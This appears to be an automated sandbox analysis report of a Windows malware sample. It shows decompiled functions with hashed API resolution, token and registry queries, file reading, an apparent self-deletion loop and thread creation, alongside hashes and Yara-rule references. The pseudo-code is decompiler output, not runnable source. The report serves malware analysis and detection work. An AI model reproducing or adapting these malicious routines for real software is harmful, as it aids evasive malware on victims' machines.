API ID: Volume$FolderLibraryLoadMountNamePathPoint
String ID: {
API String ID: 4030958988-366298937
Opcode ID: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction ID: 2801a8096cd9e8e6f79e038ecdb2c579e70d8874028a8c49ff257e7c2f12acb3
Opcode Fuzzy Hash: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction Fuzzy Hash: FC2171B6E843493AFA2132B07C63FFA31585B62B5AF050030FD0C64187FAA5AB5955B3

Uniqueness

Uniqueness Score: -1.00%

Function 0009BCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0009BCD0(void* __eflags) {
				void* _t3;
				void* _t4;
				void* _t6;
				intOrPtr* _t8;
				void* _t9;
				intOrPtr* _t10;
				signed int _t11;

				_t3 = E000A9AC0(__eflags, 0xffffffff); // executed
				_t4 = E00097DD0(0xa8);
				_t16 =  ==  ? 0x8026 : 0x801a;
				_t6 = E00099D50(0x647400a4);
				_t8 = E0009BF50(_t3 - _t4, _t6, E00099D50(0x644e562b));
				_t9 =  *_t8(0,  ==  ? 0x8026 : 0x801a, 0, 0, "C:\Users\Albus\AppData\Roaming"); // executed
				if(_t9 == 0) {
					_t10 = E0009BF50(__eflags, 0, 0xfda8b77);
					_t11 =  *_t10(0, "C:\Windows\SysWOW64\msiexec.exe", 0x104);
					__eflags = _t11;
					_t2 = _t11 != 0;
					__eflags = _t2;
					return _t11 & 0xffffff00 | _t2;
				}
				return 0;
			}

0x0009bcd8
0x0009bce7
0x0009bcfb
0x0009bd03
0x0009bd1c
0x0009bd30
0x0009bd34
0x0009bd41
0x0009bd55
0x0009bd57
0x0009bd59
0x0009bd59
0x00000000
0x0009bd59
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,C:\Users\user\AppData\Roaming), ref: 0009BD30

Strings

C:\Windows\SysWOW64\msiexec.exe, xrefs: 0009BD4E
C:\Users\user\AppData\Roaming, xrefs: 0009BD24

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FolderPath
String ID: C:\Users\user\AppData\Roaming$C:\Windows\SysWOW64\msiexec.exe
API String ID: 1514166925-2433609249
Opcode ID: 1d2181ce6100be1f9ad62c9b501fa46eaf964b88a4ffc4ec71816362a640d2df
Instruction ID: a0fe7930ad87ea9ce1ba0dcedcabb489642e65c530b824d5ec864dc6e48fc1b5
Opcode Fuzzy Hash: 1d2181ce6100be1f9ad62c9b501fa46eaf964b88a4ffc4ec71816362a640d2df
Instruction Fuzzy Hash: 88F06296F8621537FA6121B53C13FBB21488BA2B79F190130FA1D991D3F982A91452B7

Uniqueness

Uniqueness Score: -1.00%

Function 000A8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000A8590(void* __eflags, intOrPtr _a4) {
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				union _TOKEN_INFORMATION_CLASS _t22;
				int _t23;
				signed char _t24;
				signed char _t30;
				void* _t31;
				int _t33;
				intOrPtr* _t35;
				signed char* _t36;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;
				signed char* _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t61;
				void* _t63;

				_t63 = __eflags;
				_v20 = 0;
				_t16 = E00099D50(0x647400a5);
				_t18 = E0009BF50(_t63, _t16, E00099D50(0x6b5f7e12));
				_t54 = _t51 + 0x10;
				_t19 =  *_t18(_a4, 8,  &_v20);
				_t64 = _t19;
				if(_t19 == 0) {
					_t49 = 0xffffffff;
					L12:
					return _t49;
				}
				E0009BF50(_t64, 9, 0xbd557e);
				_t22 = E00099D50(0x647400b5);
				_t42 =  &_v24;
				_t23 = GetTokenInformation(_v20, _t22, 0, 0, _t42); // executed
				_t24 = E000955C0(_t23, 0);
				_t57 = _t54 + 0x14;
				_t49 = 0xffffffff;
				_t65 = _t24 & 0x00000001;
				if((_t24 & 0x00000001) == 0) {
					L10:
					E0009BF50(_t71, 0, 0xb8e7db5);
					CloseHandle(_v20); // executed
					goto L12;
				}
				_t30 = E000955C0( *((intOrPtr*)(E0009BF50(_t65, 0, E00099D50(0x68042b4e))))(), 0x7a);
				_t57 = _t57 + 0x14;
				if((_t30 & 0x00000001) == 0) {
					goto L10;
				}
				_t31 = E00098290(_v24);
				_t57 = _t57 + 4;
				_t67 = _t31;
				if(_t31 != 0) {
					_t47 = _t31;
					E0009BF50(_t67, 9, 0xbd557e);
					_t61 = _t57 + 8;
					_t33 = GetTokenInformation(_v20, 0x19, _t47, _v24, _t42); // executed
					_t49 = 0xffffffff;
					_t68 = _t33;
					if(_t33 != 0) {
						_t35 = E0009BF50(_t68, 9, 0x8847844);
						_t61 = _t61 + 8;
						_t36 =  *_t35( *_t47);
						if(_t36 != 0) {
							_t70 =  *_t36;
							_t43 = _t36;
							if( *_t36 != 0) {
								_v28 = E0009BF50(_t70, 9, 0x7a1c189);
								_t40 = E000922E0(_t70, ( *_t43 & 0x000000ff) + 0x57d8073d, 0x57d8073e);
								_t61 = _t61 + 0x10;
								_t41 = _v28( *_t47, _t40);
								_t71 = _t41;
								if(_t41 != 0) {
									_t49 =  *_t41;
								}
							}
						}
					}
					E0009B570(_t47);
					_t57 = _t61 + 4;
				}
			}

0x000a8590
0x000a859c
0x000a85a8
0x000a85c1
0x000a85c6
0x000a85d0
0x000a85d2
0x000a85d4
0x000a86f6
0x000a86fb
0x000a8704
0x000a8704
0x000a85e1
0x000a85f3
0x000a85fb
0x000a8605
0x000a860a
0x000a860f
0x000a8612
0x000a8617
0x000a8619
0x000a86e0
0x000a86e7
0x000a86f2
0x00000000
0x000a86f2
0x000a863c
0x000a8641
0x000a8646
0x00000000
0x00000000
0x000a864f
0x000a8654
0x000a8657
0x000a8659
0x000a865f
0x000a8668
0x000a866d
0x000a867a
0x000a867c
0x000a8681
0x000a8683
0x000a868c
0x000a8691
0x000a8696
0x000a869a
0x000a869c
0x000a869f
0x000a86a1
0x000a86b2
0x000a86c3
0x000a86c8
0x000a86ce
0x000a86d1
0x000a86d3
0x000a86d5
0x000a86d5
0x000a86d3
0x000a86a1
0x000a869a
0x000a86d8
0x000a86dd
0x000a86dd

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 000A8605
CloseHandle.KERNEL32(00000000), ref: 000A86F2

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Part of subcall function 00098290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 000A867A

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InformationToken$AllocateCloseHandleHeapLibraryLoad
String ID:
API String ID: 3980138298-0
Opcode ID: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction ID: ba9c5bada06ca04430abcedf7208d6edaf5fe3ce74e2084dd3272b17d58d7bd4
Opcode Fuzzy Hash: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction Fuzzy Hash: 053182A6E402053BFA1126B46D53BBE35585B52769F090030FD18B52D3FA91AE1497B3

Uniqueness

Uniqueness Score: -1.00%

Function 0009A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0009A5E0(WCHAR* _a4, void** _a8, void* _a12) {
				void* _v12;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				void* _t21;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void** _t42;
				signed int _t43;
				void* _t46;
				void* _t49;
				void* _t51;
				void* _t52;

				_t42 = _a8;
				E0009BF50(_t52, 0, 0xad68947);
				_t46 = (_t43 & 0xfffffff8) - 0x10 + 8;
				_t40 =  ==  ? 1 : 7;
				_t21 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
				_t54 = _t21 - 0xffffffff;
				_t42[2] = _t21;
				if(_t21 == 0xffffffff) {
					L4:
					_t22 = 0;
				} else {
					_t24 = E0009BF50(_t54, 0, E00099D50(0x651fdb24));
					_t49 = _t46 + 0xc;
					_push( &_v20);
					_push(_t42[2]);
					if( *_t24() == 0) {
						L3:
						_t26 = E0009BF50(_t56, 0, 0xb8e7db5);
						 *_t26(_t42[2]);
						goto L4;
					} else {
						_t56 = _v24;
						if(_v24 == 0) {
							_t28 = _v28;
							__eflags = _t28;
							_t42[1] = _t28;
							if(__eflags == 0) {
								 *_t42 = 0;
								_t22 = 1;
							} else {
								E0009BF50(__eflags, 0, 0x1f8cae3);
								_t49 = _t49 + 8;
								_t30 = VirtualAlloc(0, _t42[1], 0x3000, 4); // executed
								__eflags = _t30;
								 *_t42 = _t30;
								if(__eflags == 0) {
									goto L3;
								} else {
									E0009BF50(__eflags, 0, 0xb7ac9a5);
									_t51 = _t49 + 8;
									_t32 = ReadFile(_t42[2],  *_t42, _t42[1],  &_v32, 0); // executed
									__eflags = _t32;
									if(__eflags == 0) {
										L12:
										_t33 = E0009BF50(__eflags, 0, 0xb1fd105);
										_t49 = _t51 + 8;
										 *_t33( *_t42, 0, 0x8000);
										goto L3;
									} else {
										__eflags = _v32 - _t42[1];
										if(__eflags != 0) {
											goto L12;
										} else {
											_t22 = 1;
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				return _t22;
			}

0x0009a5eb
0x0009a5f8
0x0009a5fd
0x0009a60e
0x0009a620
0x0009a622
0x0009a625
0x0009a628
0x0009a66b
0x0009a66b
0x0009a62a
0x0009a63a
0x0009a63f
0x0009a646
0x0009a647
0x0009a64e
0x0009a657
0x0009a65e
0x0009a669
0x00000000
0x0009a650
0x0009a650
0x0009a655
0x0009a674
0x0009a678
0x0009a67a
0x0009a67d
0x0009a6d3
0x0009a6d9
0x0009a67f
0x0009a686
0x0009a68b
0x0009a69a
0x0009a69c
0x0009a69e
0x0009a6a0
0x00000000
0x0009a6a2
0x0009a6a9
0x0009a6ae
0x0009a6c0
0x0009a6c2
0x0009a6c4
0x0009a6dd
0x0009a6e4
0x0009a6e9
0x0009a6f5
0x00000000
0x0009a6c6
0x0009a6ca
0x0009a6cd
0x00000000
0x0009a6cf
0x0009a6cf
0x0009a6cf
0x0009a6cd
0x0009a6c4
0x0009a6a0
0x00000000
0x00000000
0x00000000
0x0009a655
0x0009a64e
0x0009a673

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0009A620
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0009A69A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0009A6C0

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction ID: a72eb89c18b470897a678f10b6653c5c1a7be55482207ed17d97ff94bdca1790
Opcode Fuzzy Hash: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction Fuzzy Hash: 2431F571744701BBEF216B60DC13F6A76D09B42B11F184828FAAD961D1E7B1F510EAA2

Uniqueness

Uniqueness Score: -1.00%

Function 000A5420, Relevance: 4.6, APIs: 3, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E000A5420(WCHAR* _a4) {
				void* _t4;
				signed char _t5;
				long _t7;
				intOrPtr* _t10;
				intOrPtr* _t12;
				void* _t14;
				void* _t17;
				WCHAR* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t23;

				_t18 = _a4;
				_t17 = 0;
				while(1) {
					E0009BF50(0, 0, 0xad68947);
					_t4 = CreateFileW(_t18, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
					_t19 = _t4;
					_t5 = E00094A90(_t4, 0);
					_t22 = _t20 + 0x10;
					_t28 = _t5 & 0x00000001;
					if((_t5 & 0x00000001) == 0) {
						E0009BF50(_t28, 0, 0xb8e7db5);
						_t22 = _t22 + 8;
						CloseHandle(_t19); // executed
					}
					E0009BF50(_t28, 0, 0xbf8ba27);
					_t23 = _t22 + 8;
					_t7 = GetFileAttributesW(_t18); // executed
					_t29 = _t7 - 0xffffffff;
					if(_t7 == 0xffffffff) {
						break;
					}
					_t10 = E0009BF50(_t29, 0, 0xad64007);
					 *_t10(_t18);
					_t12 = E0009BF50(_t29, 0, 0x7a2bc0);
					 *_t12(0xbb8);
					_t17 = _t17 + 1;
					_t14 = E00099D50(0x647400a6);
					_t20 = _t23 + 0x14;
					if(_t17 != _t14) {
						continue;
					}
					break;
				}
				E0009B570(_t18);
				return 0;
			}

0x000a5426
0x000a5429
0x000a5430
0x000a5437
0x000a5452
0x000a5454
0x000a5459
0x000a545e
0x000a5461
0x000a5463
0x000a546c
0x000a5471
0x000a5475
0x000a5475
0x000a547e
0x000a5483
0x000a5487
0x000a5489
0x000a548c
0x00000000
0x00000000
0x000a5495
0x000a549e
0x000a54a7
0x000a54b4
0x000a54b6
0x000a54bc
0x000a54c1
0x000a54c6
0x00000000
0x00000000
0x00000000
0x000a54c6
0x000a54cd
0x000a54db

APIs

CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 000A5452
CloseHandle.KERNEL32(00000000), ref: 000A5475
GetFileAttributesW.KERNEL32(?), ref: 000A5487

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$AttributesCloseCreateHandle
String ID:
API String ID: 4216088276-0
Opcode ID: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction ID: 59e9257859e20cd102f1783b0292012910d8ac744406bdd59104b605c7079ea9
Opcode Fuzzy Hash: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction Fuzzy Hash: 67014CA6A8420436E96032B43D53FBE31584BA6F2FF150130FA5CA91C3FAC57A1524B7

Uniqueness

Uniqueness Score: -1.00%

Function 0009ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0009ABF0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				void* _t11;
				signed char _t12;
				long _t14;
				signed int _t29;
				void* _t38;

				_t12 = E000A5000(_t11, _t38, 0xffffffff);
				E0009BF50(_t38, 9, 0xda29a27);
				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t29 = 0xffffffff;
				_t39 = _t14;
				if(_t14 == 0) {
					E0009BF50(_t39, 9, 0x8097c7);
					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
					asm("sbb esi, esi");
					_t29 =  !0x00000000 | _a24;
					E0009BF50( !0x00000000, 9, 0x3111c69);
					RegCloseKey(_a4); // executed
				}
				return _t29;
			}

0x0009abfe
0x0009ac16
0x0009ac27
0x0009ac29
0x0009ac2e
0x0009ac30
0x0009ac42
0x0009ac56
0x0009ac5d
0x0009ac61
0x0009ac6b
0x0009ac76
0x0009ac76
0x0009ac7e

APIs

RegOpenKeyExW.KERNEL32(00000000,?,00000000,?,?), ref: 0009AC27
RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 0009AC56

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

RegCloseKey.KERNEL32(?,?,?,?,?), ref: 0009AC76

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseLibraryLoadOpenQueryValue
String ID:
API String ID: 3751545530-0
Opcode ID: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction ID: 711e3e43aad391e08f1cf9e3f977c3c6a261da2600694e1e7e3509716ed60c4c
Opcode Fuzzy Hash: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction Fuzzy Hash: 6D0144779402287BDF109E959C42FEA3758DB45B75F050224FE28A72C2E6A1BD1187F1

Uniqueness

Uniqueness Score: -1.00%

Function 000A4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E000A4680(void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v52;
				char _v64;
				intOrPtr _v72;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				char _v208;
				char _v220;
				char _v232;
				char _v248;
				char _v266;
				char _v306;
				char _v528;
				char _v1048;
				void* _t171;
				void* _t173;
				void* _t175;
				intOrPtr* _t177;
				void* _t178;
				intOrPtr _t179;
				signed int _t229;
				signed int _t233;
				void* _t236;
				void* _t238;
				void* _t244;
				void* _t252;
				signed int _t254;
				void* _t263;
				void* _t269;
				void* _t276;
				intOrPtr _t279;
				signed int _t287;
				void* _t288;
				void* _t290;
				void* _t293;
				signed char _t299;
				void* _t314;
				signed int _t319;
				void* _t321;
				signed int _t323;
				signed int _t325;
				WCHAR* _t327;
				signed int _t329;
				void* _t339;
				signed int _t341;
				void* _t342;
				void* _t343;
				signed int _t350;
				signed int _t353;
				intOrPtr _t368;
				intOrPtr _t404;
				signed int _t487;
				intOrPtr _t488;
				signed int _t489;
				intOrPtr _t490;
				signed int _t499;
				intOrPtr _t512;
				signed int _t513;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t593;
				void* _t604;
				void* _t606;
				void* _t609;

				_t171 = E000A7EE0(__eflags, 0xa20123ac, 1, 0xffffffff); // executed
				_t531 = _t530 + 0xc;
				_t611 = _t171;
				if(_t171 == 0) {
					L2:
					_t350 = 0;
				} else {
					_t173 = E000A9AC0(_t611, 0xffffffff); // executed
					_t473 =  ==  ? 0x8026 : 0x801a;
					_t175 = E00099D50(0x647400a4);
					_t177 = E0009BF50(_t173 - 4, _t175, E00099D50(0x644e562b));
					_t535 = _t531 + 0x14;
					_t351 =  &_v1048;
					_t178 =  *_t177(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v1048); // executed
					if(_t178 == 0) {
						_t179 = E00098290(0x3d0);
						_t510 = _t179;
						E000A1E90(__eflags, _t179 + 0xc); // executed
						_t2 = _t510 + 0x1c; // 0x1c, executed
						E000A3BC0(_t2, __eflags);
						_t3 = _t510 + 0xe6; // 0xe6
						E00095CD0(__eflags, 2, _t3, 4, 8);
						_t4 = _t510 + 0xf8; // 0xf8
						E0009A980(_t4); // executed
						E000AF740( &_v64);
						__eflags = _a8;
						_t375 =  !=  ? 0xb0bf2 : 0xb051c;
						E000A5180( &_v1048,  &_v64, E00097200( !=  ? 0xb0bf2 : 0xb051c,  &_v528), 0); // executed
						E000AF740( &_v232);
						E000A5180( &_v1048,  &_v232, 0, 0); // executed
						E000AF740( &_v220);
						E000A5180( &_v1048,  &_v220, 0, 0); // executed
						E000AF740( &_v208);
						E000A5180( &_v1048,  &_v208, 0, 0); // executed
						E000AF740( &_v196);
						E000A5180(_t351,  &_v196, 0, 0); // executed
						E000AF740( &_v184);
						E000A5180(_t351,  &_v184, 0, 1); // executed
						E000AF740( &_v172);
						E000A5180(_t351,  &_v172, 0, 1); // executed
						E000AF740( &_v160);
						E000A5180(_t351,  &_v160, 0, 0); // executed
						E000AF740( &_v148);
						E000A5180(_t351,  &_v148, 0, 0); // executed
						E000AF740( &_v136);
						E000A5180(_t351,  &_v136, 0, 0); // executed
						E000AF740( &_v124);
						E000A5180(_t351,  &_v124, 0, 0); // executed
						E000AF740( &_v112);
						E000A5180(_t351,  &_v112, 0, 0); // executed
						E000AF740( &_v100);
						E000A5180(_t351,  &_v100, 0, 0); // executed
						_t487 =  &_v88;
						E000AF740(_t487);
						_t470 = _t487;
						E000A5180(_t351, _t487, 0, 0); // executed
						E000921E0(2, 0x80000001, E00097200(0xb09d0,  &_v306),  &_v266, 4, 8); // executed
						_t404 = _t179;
						_t23 = _t404 + 0x3be; // 0x3be
						_t488 = _t404;
						_v24 = _t404;
						E0009D4F0(_t487, 0, _t23, 4, 8);
						_t25 = _t488 + 0x3c7; // 0x3c7
						E0009D4F0(_t487, 0, _t25, 4, 8);
						_t489 = E000922E0(__eflags, E0009BA30(__eflags, _t351), 0xffffffff);
						_t229 = E0009EC30(E000AFCF0( &_v64) + _t489 * 2, 0xffffffff, _t179 + 0x1fe, 0x20);
						_t512 = _v24;
						__eflags = _t229;
						_t353 = 0 | _t229 == 0x00000000;
						_v20 = _t512 + 0x25e;
						_t233 = E0009EC30(E000AFCF0( &_v232) + _t489 * 2, 0xffffffff, _v20, 0x20);
						_t38 = _t353 + 1; // 0x1
						__eflags = _t233;
						_t513 = _t512 + 0x27e;
						_t408 =  !=  ? _t353 : _t38;
						_v20 =  !=  ? _t353 : _t38;
						_t236 = E0009EC30(E000AFCF0( &_v220) + _t489 * 2, 0xffffffff, _t513, 0x20);
						_t490 = _v24;
						__eflags = _t236 - 1;
						asm("sbb esi, esi");
						_v28 = _t490 + 0x29e;
						_t238 = E000AFCF0( &_v208);
						_v32 = _t489;
						__eflags = E0009EC30(_t238 + _t489 * 2, 0xffffffff, _v28, 0x20) - 1;
						asm("sbb esi, [ebp-0x10]");
						_v28 =  ~_t513;
						_v20 = _t490 + 0x2be;
						_t244 = E000AFCF0( &_v196);
						__eflags = E0009EC30(_t244 + _t489 * 2, 0xffffffff, _v20, E00099D50(0x6474008c));
						_t356 = 0 | __eflags == 0x00000000;
						_v20 = E00091460(__eflags, _t513,  ~(__eflags == 0));
						E00091460(__eflags, _v28, _t356);
						_t252 = E000AFCF0( &_v184);
						_t254 = E0009EC30(_t252 + _v32 * 2, 0xffffffff, _v24 + 0x21e, E00099D50(0x6474008c));
						__eflags = _t254;
						_v28 = E00099D50(0x59d06af4);
						_v36 = _v24 + 0x23e;
						_v36 = E0009EC30(E000AFCF0( &_v172) + _v32 * 2, 0xffffffff, _v36, 0x20);
						_v40 = E00099D50(0xe4894f31);
						_t263 = E0009EC30(E000AFCF0( &_v160) + _v32 * 2, 0xffffffff, _v24 + 0x2de, 0x20);
						__eflags = _v36 - 1;
						asm("adc ebx, 0x0");
						__eflags = _t263 - 1;
						asm("adc ebx, 0x0");
						__eflags = E0009EC30(E000AFCF0( &_v148) + _v32 * 2, 0xffffffff, _v24 + 0x2fe, 0x20);
						_t419 = 0 | __eflags == 0x00000000;
						_v20 = (_t254 == 0) - _v28 + _v20 + _v40 - 0x4358e545;
						_t269 = E00091460(__eflags, (_t254 == 0) - _v28 + _v20 + _v40 + 0xddcba449, __eflags == 0);
						E00091460(__eflags, _v20, _t419);
						_v20 = _v24 + 0x31e;
						__eflags = E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20);
						_v20 = E00091460(E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20), _t269 + 0xdedb7672, 0 | E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20) == 0x00000000);
						_t276 = E000AFCF0( &_v124);
						__eflags = E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c));
						_t279 = E00091460(E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c)), _v20, 0 | E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c)) == 0x00000000);
						_v20 = _v24 + 0x35e;
						__eflags = E0009EC30(E000AFCF0( &_v112) + _v32 * 2, 0xffffffff, _v20, 0x20) - 1;
						asm("adc esi, 0x0");
						_v20 = _t279;
						_t287 = E000955C0(E0009EC30(E000AFCF0( &_v100) + _v32 * 2, 0xffffffff, _v24 + 0x37e, 0x10), 0);
						_t288 = E00099D50(0x1eac204e);
						_t290 = E00091460(__eflags, _v20 - _t288 + (_t287 & 0x00000001), E00099D50(0x1eac204e));
						E00091460(__eflags, _v20, _t287 & 0x00000001);
						_t368 = _v24;
						_v20 = _t368 + 0x38e;
						_t293 = E000AFCF0( &_v88);
						__eflags = E0009EC30(_t293 + _v32 * 2, 0xffffffff, _v20, E00099D50(0x647400bc)) - 1;
						asm("adc esi, 0x0");
						__eflags = E0009EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1;
						asm("adc esi, 0x0");
						_t299 = E00096BB0(E0009EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1, _t290, 0);
						_t593 = _t535 + 0x240;
						__eflags = _t299 & 0x00000001;
						if((_t299 & 0x00000001) != 0) {
							L14:
							_t350 = 0;
							__eflags = 0;
						} else {
							_t314 = E00099D50(0x647410ac);
							_t499 = E0009D620(_t314, E00099D50(0x6474ff53));
							_t319 = E000920A0(__eflags, _t499,  !(E00099D50(0x6474ff53)));
							E00099D50(0x6474ff53);
							_t321 = E00099D50(0x647410ac);
							_t323 = E0009D620(_t321, E00099D50(0x6474ff53));
							 *(_t368 + 0x1fa) = _t323 << E00099D50(0x647400bc) | _t319 & _t499;
							_t325 = E0009D030(_t324, __eflags, _t368); // executed
							_t604 = _t593 + 0x38;
							__eflags = _t325;
							if(_t325 == 0) {
								goto L14;
							} else {
								_t529 = _a4;
								E000AEDD0( &_v52);
								_t327 = E000AFCF0(_a4);
								_t329 = E0009A5E0(_t327,  &_v76, E00099D50(0x647400ae)); // executed
								_t606 = _t604 + 0x10;
								__eflags = _t329;
								if(_t329 != 0) {
									_t470 = _v72 + _v76;
									__eflags = _v72 + _v76;
									E000AF410(_v76,  &_v52, _v76, _v72 + _v76); // executed
									E000A9C40(__eflags,  &_v76); // executed
									_t606 = _t606 + 4;
								}
								_t447 =  &_v52;
								__eflags = E000AF190( &_v52);
								if(__eflags != 0) {
									_t339 = E000AF190( &_v52);
									_t341 = E000ACB00(__eflags,  &_v248, E000AEE10( &_v52), _t339); // executed
									_t609 = _t606 + 0xc;
									__eflags = _t341;
									if(__eflags != 0) {
										E0009ECC0(_t341,  &_v248, _t470, __eflags); // executed
									}
									_t342 = E000AF190( &_v52);
									_t343 = E000AEE10( &_v52);
									_t447 =  &_v64;
									E000A9600(E000AFCF0( &_v64), __eflags, _t344, _t343, _t342); // executed
									_t606 = _t609 + 0xc; // executed
								}
								E000A04C0(_t447, _t470, __eflags); // executed
								E000A5040(_t447, _t470, __eflags); // executed
								__eflags = E000A6700(__eflags);
								if(__eflags != 0) {
									E0009BF50(__eflags, 0, 0xa0733d4);
									CreateThread(0, 0, E000A5420, E000A7640(E000AFCF0(_t529), 0xffffffff), 0, 0); // executed
								}
								E000AFB40( &_v52); // executed
								_t350 = 1;
							}
						}
						E000AFB20( &_v88);
						E000AFB20( &_v100);
						E000AFB20( &_v112);
						E000AFB20( &_v124);
						E000AFB20( &_v136);
						E000AFB20( &_v148);
						E000AFB20( &_v160);
						E000AFB20( &_v172);
						E000AFB20( &_v184);
						E000AFB20( &_v196);
						E000AFB20( &_v208);
						E000AFB20( &_v220);
						E000AFB20( &_v232);
						E000AFB20( &_v64);
					} else {
						goto L2;
					}
				}
				return _t350;
			}

0x000a4695
0x000a469a
0x000a469d
0x000a469f
0x000a46f4
0x000a46f4
0x000a46a1
0x000a46a3
0x000a46b7
0x000a46bf
0x000a46d8
0x000a46dd
0x000a46e0
0x000a46ee
0x000a46f2
0x000a4700
0x000a4708
0x000a470e
0x000a4716
0x000a4719
0x000a471e
0x000a472b
0x000a4733
0x000a473a
0x000a4747
0x000a474c
0x000a475a
0x000a4774
0x000a4784
0x000a4791
0x000a47a1
0x000a47ae
0x000a47be
0x000a47cb
0x000a47db
0x000a47e8
0x000a47f8
0x000a4805
0x000a4815
0x000a4822
0x000a4832
0x000a483f
0x000a484f
0x000a485c
0x000a486c
0x000a4879
0x000a4886
0x000a4893
0x000a48a0
0x000a48ad
0x000a48ba
0x000a48c7
0x000a48cf
0x000a48d4
0x000a48db
0x000a48e1
0x000a4910
0x000a4918
0x000a4920
0x000a4926
0x000a4928
0x000a4932
0x000a493a
0x000a4947
0x000a4966
0x000a4976
0x000a497e
0x000a4983
0x000a498b
0x000a4994
0x000a49a7
0x000a49af
0x000a49b2
0x000a49b4
0x000a49ba
0x000a49bd
0x000a49d6
0x000a49de
0x000a49e1
0x000a49ea
0x000a49f2
0x000a49f5
0x000a49fd
0x000a4a10
0x000a4a19
0x000a4a20
0x000a4a29
0x000a4a2c
0x000a4a52
0x000a4a54
0x000a4a65
0x000a4a6c
0x000a4a83
0x000a4aa0
0x000a4aaa
0x000a4abf
0x000a4ace
0x000a4ae9
0x000a4aff
0x000a4b19
0x000a4b32
0x000a4b36
0x000a4b39
0x000a4b3f
0x000a4b60
0x000a4b68
0x000a4b71
0x000a4b78
0x000a4b8c
0x000a4ba3
0x000a4bc3
0x000a4bd5
0x000a4bde
0x000a4c02
0x000a4c0b
